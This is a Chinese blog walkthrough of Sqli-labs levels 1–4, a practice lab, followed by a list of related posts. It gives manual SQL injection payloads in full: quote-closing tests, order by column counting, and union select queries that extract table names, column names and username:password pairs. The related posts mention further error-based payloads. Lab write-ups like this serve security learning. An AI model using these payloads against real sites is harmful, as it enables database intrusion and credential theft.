Sql-Labs 1-4关“基于于错误类型的注入”详细记录

最新推荐文章于 2024-05-22 10:33:41 发布
最新推荐文章于 2024-05-22 10:33:41 发布
阅读量246 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Suspending/article/details/102654821
版权
  • 声明:其实我本人已经做到第30题左右了,但是一直是用sqlmap跑的(因为最近事情比较多),所以回来补一下手注知识顺便做一下博客方便以后的复习。因为第一关能够代表下面三关所以重点讲下第一关。*

第一题

在这里插入图片描述
  进入输入?id=1’然后报错
在这里插入图片描述
分析猜测SQL语句:select * from users where id=‘1’ limit0,1(注:这里users还不知道),并猜测注入类型为字符型
接下来验证猜测:先作一次闭合,再将后面的语句注释掉。语句如下:?id=1’ --+
在这里插入图片描述
  得到以上画面,说明猜测正确,
  1.接下来判断字段数,利用以下语句:
  ?id=1’ order by 4–+

在这里插入图片描述
  说明字段数为4.
  2.接下来构造语句来获取表名。
  0’ union select 1,group_concat(table_name),3 from   information_schema.tables where table_schema=database() - -+
在这里插入图片描述
  猜测用户名,密码在users表内。

  3.构造语句猜列名:0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ —+

在这里插入图片描述
  4.最后就是获取字段值,利用语句:0’ union select   1,group_concat(username,0x3a,password),3 from users—+

在这里插入图片描述
  最后爆出字段值。
  总结:首先利用’判断类型,然后构造语句来进行注入。

第二题

  利用单引号判断类型。

在这里插入图片描述
得出是基于数字的注入。下面就好解决了。直接构造语句:?id=1 order by 4–+ 判断字段数。后面的语句也大同小异也就是去掉1后面的单引号。

第三题

  和上面一样利用单引号判断类型。
在这里插入图片描述
  发现多出一个)分析得SQL语句为 select * from users where   id=(‘1’) limit 0,1
  方法也大同小异,构造语句:?id=1’) order by 4–+判断字段数,后面也是差不多的(我比较懒,能省就省)。

第四题

  第四题利用单引号判断,发现不行,在利用?id=1
在这里插入图片描述
  判断出SQL语句为: select * from users where id=(“1”)
  这样就好办了,直接构造语句:?id=1") order by 4–+

  • 最后重声明一下,由于本人比较菜,希望大牛勿喷,后面的题目有空就补一下,由于前面几题比较简单,sqlmap可以直接跑出,sqlmap的就不加上了。第一次写,排版不怎么好看。。。。
幻灭魔神
关注
史上最详细sql-labs通秘籍less1-4
weixin_50644728的博客
11-24 896
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库。
sql-labs 闯 5~10
qq_44663230的博客
08-14 1763
sql-labs 第5~10 盲注系列
9、sqli-labs(报错注入1-4)
weixin_41489908的博客
11-26 165
less 1 1、http://192.168.1.119/sqli/Less-1/?id=1 2、在id后面输入’,网页报错, 3、报错内容’1’’ LIMIT 0,1 4、猜测该sql语句为select * from ad where id=‘id’ limit 0,1 5、我们试着闭合 http://192.168.1.119/sqli/Less-1/?id=1’ --+ 程序正常 6、通过...
sql libs报错注入
weixin_51387754的博客
10-24 590
SQL 注入SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
sql-labs报错注入
weixin_47346400的博客
03-12 614
updatexml() 爆数据库 爆表 爆用户
sql_labsqli中的报错注入,less13
qq_59020256的博客
12-21 575
或者用1') and extractvalue('1',concat('1',database())) -- s。注意该结果只能显示一行,所以说需要username和password分开查询,否则会出现错误。2.输入用户名和密码123’ 123显示登录错误。1.输入用户名和密码123 123显示登录错误。6.查询username和password。123后面有’)说明是’)注入。5.查询users用户的字段名。报错注入(less-13)Username结果显示。Password结果显示。
sql注入之报错注入
weixin_45653478的博客
04-08 1322
报错注入的原理基于应用程序在处理数据库查询时产生的错误信息。当应用程序执行一个含有恶意SQL代码的查询时,如果查询出错(例如,由于语法错误或权限不足),数据库系统通常会返回一个错误信息给应用程序。当它的第二个参数不是一个合法的XPath表达式时,会引发错误,并可能返回包含攻击者所需信息的错误消息。在报错注入中,攻击者可能会构造特定的SQL语句,利用floor()函数的特性来触发错误,并从中获取数据库信息。:这也是MySQL的一个XML函数,用于改变(查找并替换)XML文档中符合条件的节点的值。
sql-labs通技巧
03-01
本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1`中,通过尝试`id=1 and 1=2--+`,我们发现没有变化,这表明可能存在字符型注入...
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
#### Less-1:基本SQL注入 在这一中,玩家将面对一个常见的SQL注入点。注入点出现在URL参数中,例如`?id=1'`。此卡旨在考察用户是否了解SQL注入的基本原理及其应用。 **知识点解析**: - **SQL注入基础**:...
sql-labs 闯 11~20
qq_44663230的博客
08-21 1581
sql-labs闯11~20
SQL-labs练习记录(5~6)【报错注入
bin789456的博客
06-07 203
SQL-labs练习记录(5~8) Less 5 第五会发现与之前的完全不同,它只显示了you are in…并不能直接查询,也不好查看回显位置 首先直接单引号测试能够发现报错,爆了一个附近有双引号,可以闭合,但是闭合后恢复正常,仍旧没有数据。 这里我们利用的是错误回显爆出数据,故意出错,写出数据 ...
SQL 报错注入详解
2301_78008478的博客
05-08 1042
近期学习 SQL 报错注入,本篇文章为于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
sqli-labs通全解--于报错注入--less5-6-3
cyynid的博客
01-10 631
报错注入+less5+less6
SQLI-labs-第四
weixin_54055099的博客
09-04 873
SQLI第四的思路跟步骤
sqli-labs---第四
最新发布
2201_75556700的博客
05-22 409
6、查询用户名和密码字段的值 ,用id分隔开方便观看。4、查询表名(有4张表,我们查询users这张表)3、查询数据库名(库名为security)可判断为字符型闭合,")为闭合方式。2、查询列数,判断回显位置。5、查询users表中字段。id=1'(正常回显)id=1(正常回显)
Sqli-labs——lesson17报错注入
weixin_62281892的博客
07-06 234
lesson17
SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2
King_Ho的博客
07-24 527
Less-1 先以get方式输入?id=1 or 1=1 --,结果如下,未报错并且绿字反馈用户名及密码: http://127.0.0.1/sqli-labs/Less-1/?id=1 or 1=1 -- 测试闭合符号,常见的闭合符号有'、"、')、"),这一用到的闭合符号恰巧都能使用 判断列数oeder by (by 3测试字段数为3) http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ 直到值为4的时候反馈库中没有第四列数据: un
sqli-labs 基础篇1~4 详细解析
Lucky小小吴的小屋
01-08 718
在这里,就直接看到答案了,主要是因为他的源码构成的,当输入id=1时,会输出一个数据,恰好我们需要的账号和密码就是第一条数据,不过我们要按照顺序,慢慢爆。id=1’ ”,报错’ 1’ ') LIMIT 0,1 ,根据我们注入sql语句,可以判断出源码存在括号。根据《Web安全深度剖析》上,讲到sql数字型注入存在验证方式,大致分为三步,满足三句话,即可能存在sql注入。id=1‘ ”,发现报错 ’ LIMIT 0,1。上述分析,我们注入时,不加分号,故接下来的数据库结构判断的sql注入语句是……
sql-labs 1-4(联合查询)
kuller_Yan的博客
06-27 293
less-1: id=1’ or 1=1 --+;判断是否有注入 select * from users order by 1 :对字段里面第一列进行排序 select * from users order by 2 :对字段里面第二列进行排序 select * from users order by 3 :对字段里面第三列进行排序 id=1’ order by 1 --+ ;然后依次测试2,3,4,以测试数据库列数 id=-1’ union select 1,2,3 --+ 测试可以回显的列数位置
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值